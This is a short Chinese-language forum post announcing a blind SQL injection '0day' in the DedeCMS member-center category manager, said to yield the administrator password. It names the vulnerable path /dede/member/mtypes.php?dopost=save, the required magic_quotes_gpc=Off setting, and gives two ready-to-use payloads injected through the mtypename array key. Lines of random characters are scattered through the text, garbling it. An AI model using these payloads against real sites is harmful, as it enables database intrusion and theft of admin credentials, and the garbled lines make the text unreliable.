DedeCMS会员中心分类管理SQL注射0day漏洞可获得管理员密码

admin

需要magic_quotes_gpc = Off,所以说是鸡肋啊.
0 J  e- K8 ~. P# O" Z

! _, G$ Z. p' o8 S9 \发生在数组key里的注射漏洞,有点意思.
" A; B) g/ D$ [. i' W; Y
1 o: g. j0 a# d& \这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下

1 @/ A* L$ M& Xhttp://www.xxx.com /dede/member/mtypes.php?dopost=save

& S  D0 }7 S5 v7 ]9 y8 ]+ U+ [exploit:
7 P" y( o/ i. d! `8 O' Y& M& `mtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r
4 s7 b% ]5 {9 l7 L5 Smtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r
$ [, i) B: n; Q1 V0 H